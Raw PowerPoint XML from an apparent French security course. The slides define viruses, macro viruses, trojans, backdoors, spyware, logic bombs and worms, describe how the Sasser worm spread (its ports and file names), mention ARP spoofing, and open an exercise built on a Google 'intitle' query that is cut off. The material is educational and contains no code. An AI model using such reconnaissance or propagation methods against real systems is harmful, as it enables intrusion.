            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Investis des sommes importantes pour briser les systèmes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Ressources et expertise considérables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Motivation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>L’argent</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22028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023BCE-F1B0-4256-B075-29F5C07A44AE}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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D’autres attaques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mtClean="0"/>
              <a:t>Virus :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>programme malicieux qui est capable de se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" smtClean="0"/>
              <a:t>reproduire : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>de créer des copies de lui-même et de les répandre par :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>insertion dans d’autres programmes (infection, parasitage)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>insertion dans des sections exécutables de disquettes, de clés….</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>diffusion par courrier électronique</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>diffusion via un réseau</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3283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8C2200-2219-43F0-ABF7-9F37582CB2FA}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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D’autres attaques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mtClean="0"/>
              <a:t>Un virus est glissé volontairement dans une application dans le but de nuire. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Il est possible d'attraper un virus avec n'importe quelle application que l'on a installée et que l'on exécute, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Un virus ne peut être introduit dans sa machine que si l'on exécute une application infectée,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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1054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502BEF-ADB9-4A65-9E76-56D2C2FA424C}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Virus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fr-FR" i="1" smtClean="0"/>
              <a:t>Volatile</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>disparaît lorsque le programme infecté se termine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Entre temps, il peut avoir eu le temps d’infecter d’autres programmes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" i="1" smtClean="0"/>
              <a:t>Permanent </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1" indent="-285750" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>demeure actif ou activable après que le programme infecté se termine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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9817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6B161E-2AC4-42DA-AC6E-05BF05787B0B}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Virus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fr-FR" i="1" smtClean="0"/>
              <a:t>transient  : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>actif lorsque son hôte est actif.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" i="1" smtClean="0"/>
              <a:t>résident : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>s'installe en mémoire et ne dépend donc plus de son programme hôte. Il peut infecter d'autres virus.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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4001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4256854-43B2-4947-AC35-C5CA198F9EE1}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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D’autres attaques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600" smtClean="0"/>
              <a:t>Virus Macro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Ces virus sont des séquences de macro-instructions contenues dans un document (texte, chiffrier) et qui sont exécutées lorsque ce document est ouvert.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Ces virus sont particulièrement dévastateurs:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>attachés à des fichiers de données, déjouant ainsi les protections d'intégrité sur les programmes du SE.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>écrits dans un langage de haut niveau, donc beaucoup plus portables que les virus de démarrage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>Les documents sont facilement échangés par courriel, ce qui facilite leur propagation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="2600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42484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61B4F1-043D-4F93-A3DB-13151C22F626}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Usurpation d’identité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Attaque par reproduction (replay attack)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Consiste à surveiller et capturer une séquence d’authentification réussie en vue de l’utiliser ultérieurement afin d’obtenir un accès authentifié</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Ceci se fait grâce à l’écoute clandestine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23796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6F1B6E-B724-4F17-805E-3EAE42B8C791}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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0" smtClean="0"/>
              <a:t>Les scripts et applets dans le HTML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fr-FR" sz="2100" smtClean="0"/>
              <a:t>Les scripts (javascript, vbscript).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000" smtClean="0"/>
              <a:t>possibilité de lancer des exécutables locaux, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>Les applets Java ou les composants ActiveX.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000" smtClean="0"/>
              <a:t>introduits dans les pages HTML sous la forme de composants compilés (ou pré compilés).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000" smtClean="0"/>
              <a:t>Leur contenu n'est pas visible et les outils qui permettent de les construire (Java ou Visual Basic) offrent des fonctions permettant de réaliser des opérations extrêmement dangereuses.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000" smtClean="0"/>
              <a:t>exemple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fr-FR" sz="1800" smtClean="0"/>
              <a:t>Utiliser votre carnet d'adresse à votre insu pour "spammer" à toutes vos connaissances le même message malicieux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>Les "plug-in"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000" smtClean="0"/>
              <a:t>qui sont des extensions ajoutées aux navigateurs</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3618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5D76D6A-63CE-4BA4-865F-F620EDE74747}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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b="0" smtClean="0"/>
              <a:t>Les "backdoors", "trojans" et assimilés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z="2600" smtClean="0"/>
              <a:t>Un cheval de Troie est une application, d'apparence inoffensive contenant du code malveillant</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>installe discrètement une porte dérobée. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>Exemple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>fausse commande de listage des fichiers, qui détruit les fichiers au lieu d'en afficher la liste.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>principaux chevaux de Troie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>programmes ouvrant des ports de la machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>permet à son concepteur de s'introduire sur une machine par le réseau en ouvrant une </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" b="1" smtClean="0"/>
              <a:t>porte dérobée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="220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6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90BE82-BAA8-451B-843D-CE039AC07EC0}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>52</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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0" smtClean="0"/>
              <a:t>Porte dérobée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mtClean="0"/>
              <a:t>Caractéristique cachée d’un programme qui donne un accès, en dehors des modes d’accès normaux, à des fonctions ou des privilèges</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Parfois créées pour déboguage ou entretien, parfois créées accidentellement, p.ex. mauvais traitement d’exceptions (buffer overflow)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="-109" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr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23617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C37373-1A56-4E58-B87D-044E31CCFCA3}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>53</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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0" smtClean="0"/>
              <a:t>Porte dérobée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fr-FR" sz="2500" smtClean="0"/>
              <a:t>Une porte dérobée est en gros un logiciel de contrôle à distance. Il fonctionne comme un serveur, sur un port connu de celui qui a conçu le piège. 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500" smtClean="0"/>
              <a:t>Un simple scan d'adresses IP sur ce port permet alors de repérer les machines infectées actuellement en ligne. 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500" smtClean="0"/>
              <a:t>Le pirate peut s'y connecter et faire plus ou moins ce qu'il veut sur la machine distante. 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500" smtClean="0"/>
              <a:t>Très dangereux.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500" smtClean="0"/>
              <a:t>peut heureusement être repéré relativement simplement, en prenant la précaution de vérifier périodiquement les ports ouverts sur sa machine. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="2500" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37884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CA13261-D149-4E5A-896D-C84634439751}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>54</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Spyware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mtClean="0"/>
              <a:t>très à la mode actuellement. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>envoie des informations diverses sur le contenu de votre machine, vos habitudes sur l'Internet etc. à un serveur qui les récupère.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Les "spywares " sont souvent implantés dans des logiciels de démonstration ou des "sharewares".</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just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19065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AA3910C-02E5-46C0-AD7A-6755E87C2F7F}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Spyware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mtClean="0"/>
              <a:t>Les informations récoltées peuvent être : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>les URL des sites visités, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>les mots-clés saisis dans les moteurs de recherche, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>l'analyse des achats réalisés via internet, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>les informations de paiement bancaire </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Des informations personnelles. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31259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CE187B-0F64-4184-9BA6-F3231A997364}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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b="0" smtClean="0"/>
              <a:t>Les défauts logiciels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z="2600" smtClean="0"/>
              <a:t>Permettent d'exploiter certaines failles de sécurité sur des applications serveur "officielles" pour les utiliser comme porte d'entrée, en général par débordement de pile.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>Bugs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>permettent de prendre la main sur une machine, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Exemple </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2100" smtClean="0"/>
              <a:t>serveurs FTP mal configurés sont un danger immédiat , </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>Le pirate qui réussit l'opération peut alors installer une porte dérobée pour la suite des opérations.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" sz="2600" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229195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9AB9CB-B822-4789-9389-1E1DCCE120EE}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>57</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Bombe, Ver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fr-FR" smtClean="0"/>
              <a:t>Bombe: programme malicieux qui ne déclenche son action qu’après qu ’une certaine condition soit remplie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>Ver : </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>programme malicieux qui utilise un réseau pour se répandre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:t>un programme qui se réplique, mais qui n'infecte pas.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="fr-FR" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30875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B3B2DB-33D5-449D-AC40-94F0F7C4A7FB}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>58</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Exemple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fr-FR" sz="2600" smtClean="0"/>
              <a:t>Apparu en mai 2004, le ver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" b="1" smtClean="0"/>
              <a:t>Sasser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t> (connu également sous les noms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>W32/Sasser.worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>W32.Sasser.Worm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>Worm.Win32.Sasser.a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>Worm.Win32.Sasser.b</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t> ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>Win32.Sasser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/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200" smtClean="0"/>
              <a:t>exploite une faille du service LSASS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" i="1" smtClean="0"/>
              <a:t>Local Security Authority Subsystem Service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" smtClean="0"/>
              <a:t>, correspondant à l'exécutable lsass.exe) de Windows.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200" smtClean="0"/>
              <a:t>premier virus qui exploite la faille du service LSASS de Windows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200" smtClean="0"/>
              <a:t>deux semaines après la publication de la faille et la mise à disposition des premiers correctifs.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fr-FR" sz="2200" smtClean="0"/>
              <a:t>Windows NT 4.0, 2000, XP et Windows Server 2003. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113104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14B57B-C9E3-4BAE-97EE-7A5E67E0E194}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>59</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR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Ver </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="0" smtClean="0"/>
              <a:t>Sasser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fr-FR" sz="2600" smtClean="0"/>
              <a:t>lance 128 processus chargés de scanner une plage d‘adresses IP aléatoire à la recherche de systèmes vulnérables à la faille LSASS sur le port 445/TCP. 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600" smtClean="0"/>
              <a:t>installe un serveur FTP sur le port 5554 afin de se rendre disponible en téléchargement aux autres ordinateurs infectés, </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t>Puis, lorsqu'une machine vulnérable est trouvée, le ver ouvre un shell distant sur la machine (sur le port TCP 9996), et force la machine distante à télécharger une copie du ver (nommée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>avserve.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t> ou </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" i="1" smtClean="0"/>
              <a:t>avserve2.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2600" smtClean="0"/>
              <a:t> pour la variante Sasser.B) dans le répertoire de Windows. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10747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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Arp spoofing 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Pollution des caches arp avec de fausses associations adresse mac/adresse IP.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> Permet des attaques de type "man in the middle", DOS, transgression des règles d'un firewall par spoofing.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68085DF-B59D-4D26-8534-318901013482}" type="slidenum">
              <a:rPr lang="fr-FR"/>
              <a:pPr eaLnBrk="1" hangingPunct="1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36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00225"/>
            <a:ext cx="72009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513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278267" cy="530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92696"/>
            <a:ext cx="815340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404665"/>
            <a:ext cx="8020050" cy="545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548680"/>
            <a:ext cx="8067675" cy="529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48680"/>
            <a:ext cx="798195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424936" cy="59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764704"/>
            <a:ext cx="828092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76673"/>
            <a:ext cx="8010525" cy="529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260648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Exercice d’application N°1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544" y="944604"/>
            <a:ext cx="651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Taper sur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>requette</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> suivante :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>intitle</a:t>
            </a:r>
            <a:r>
